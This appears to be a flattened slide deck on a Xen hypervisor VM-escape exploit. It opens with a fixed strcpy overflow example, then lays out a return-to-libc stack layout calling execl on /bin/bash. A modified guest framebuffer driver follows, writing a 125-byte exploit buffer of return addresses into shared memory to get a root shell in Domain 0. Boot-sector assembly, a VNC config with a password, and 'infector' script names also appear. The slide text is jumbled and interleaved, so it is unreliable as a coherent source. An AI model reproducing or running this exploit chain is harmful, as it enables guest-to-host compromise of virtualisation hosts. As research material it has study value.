GNUDebugger 6
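/* Capacity of the local copy target. The original listing copied argv[1]
 * into a 30-byte automatic array with strcpy(), so any argument of 30 or
 * more bytes wrote past the end of buf (stack buffer overflow). */
enum { VULNCPY_BUF_SIZE = 30 };

/*
 * Copy the C string `a` into a fixed-size local buffer without
 * overrunning it.
 *
 * At most VULNCPY_BUF_SIZE - 1 bytes are copied and the result is always
 * NUL-terminated; longer input is truncated rather than spilling onto the
 * stack. A NULL argument is treated as the empty string. The buffer is
 * local and the function has no observable result; it exists to show the
 * bounded form of the copy.
 *
 * @param a  source string, may be NULL
 */
void vulncpy(char *a)
{
    char buf[VULNCPY_BUF_SIZE];
    unsigned i = 0;

    if (a) {
        /* stop one short of the capacity to leave room for the terminator */
        for (; i + 1 < sizeof buf && a[i] != '\0'; i++) {
            buf[i] = a[i];
        }
    }
    buf[i] = '\0';
    (void)buf;
}

/*
 * Entry point: pass the first command-line argument to vulncpy().
 *
 * argv[1] is attacker-controlled input, so its presence is checked before
 * it is dereferenced (the original read argv[1] unconditionally). main()
 * returns int as required by the C standard; 0 means success.
 */
int main(int argc, char **argv)
{
    if (argc > 1) {
        vulncpy(argv[1]);
    }
    return 0;
}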
strcpy 9
11 Xen Hypervisor 3.1.2 ds->data wh Domain U Domain 0 Xen Hypervisor ds->data = realloc(ds->data, w * h * vs->depth);
12 Domain 0 memcpy(void *dest, void *src, size_t n) VNC Domain 0 stack memcpy xenfb->ds->data memcpy xenfb->pixels Shared mem Domain U Shared mem memcpy(xenfb->ds->data +(line*xenfb->ds->linesize) +(x*xenfb->ds->depth/8), xenfb->pixels +(line*xenfb->row_stride) +(x*xenfb->depth/8), w*xenfb->depth/8 );
static void xenfb_guest_copy(struct xenfb *xenfb, int x, int y, int w, int h){... for (line = y; line < (y+h); line++){ memcpy(...); static void xenfb_on_fb_event(struct xenfb *xenfb){... x = MAX(event->update.x, 0); y = MAX(event->update.y, 0); w = MIN(event->update.width, xenfb->width - x); h = MIN(event->update.height, xenfb->height - y); if (w < 0 h < 0) {... if (x!= event->update.x y!= event->update.y w!= event->update.width h!= event->update.height) 13
&buf buf Shellcode &buf...... 14
Caller ESP... 15
int execl(const char *path, const char *arg,...) 1 main(){ 2 char *path = "/bin/bash"; 3 char *arg0 = "bash"; 4 char *arg1 = "-c"; 5 char *arg2 = "ls"; 6 execl(path, arg0, arg1, arg2, NULL); 7 8 return; 9 } <main+0> <main+8> Code... <execl+0> Code... ESP path /bin/bash arg0 bash arg1 -c arg2 ls <execl+0> <main+6> 16
&buf ESP dummy data <execl +0> /bin/ bash -c ls <exit+0> path arg0 arg1 arg2 17
18 1183744 bytes xenfb_refresh static int devinit xenfb_probe(struct xenbus_device *dev,...){... ret = register_framebuffer(fb_info);... info->page->width = 9600000; info->page->height = 2769471; info->update_wanted = 1; xenfb_refresh(info, 0, 0, 1, 1);... xenfb_do_update(info, 336261, 1011, 32, 1); ds->data = realloc(ds->data, w * h * vs->depth); for (line = y; line < (y+h); line++){ memcpy(...);
notify_remote_via_irq(info->irq); static void xenfb_do_update(...){... char *ptr = info->fb; char exploit[125] = "\x10\x18\xe8\xb7" "\x90\x90\x90\x90" "\x38\xb6\xff\xbf" "\x42\xb6\xff\xbf" "\x47\xb6\xff\xbf" <execl+0> <dummy> <path> <arg0> <arg1> int i = "\x4a\xb6\xff\xbf" 0; int payload_shift "\x00\x00\x00\x00" = 45; "/bin/bash\0" if(h!= "bash\0" 1) return; "-c\0" ptr += "Root payload_shift; Shell Command"; while(i++ < xenfb_mem_len*15) *ptr++ = exploit[i%(125)]; <arg2> NULL 19
Dom. U (Debian 6) 2.6.26-1-xen-686 Dom. 0 (Debian 5) 2.6.26-1-xen-686 Kernel qemu-dm 3. realloc() 6. memcpy() Xen Hypervisor 3.2.0 Intel Core Duo T2400 20
times 510-($-$$) db 0 Boot_Signature dw 0AA55h org 7C00h pushad mov [cs:boot_stack_pointer],esp cli cld... mov gs,bx test dl,80h jz Drive_Error test dh,00100000b jnz Drive_Error mov [Boot_Drive],dx mov ax, 023eh mov cx, 0002h jmp mov 0000h:System_Loader dx, [Boot_Drive] mov bx, 0000h mov es, bx mov bx, System_Loader int 13h 24
windows hvm config builder='hvm' vnclisten="140.115.80.83" vncpasswd='9527' vncunused=1 windows hvm tightvnc hvm binary make debug xm dmesg infector.sh <target_image> doctor.sh <target_image> 25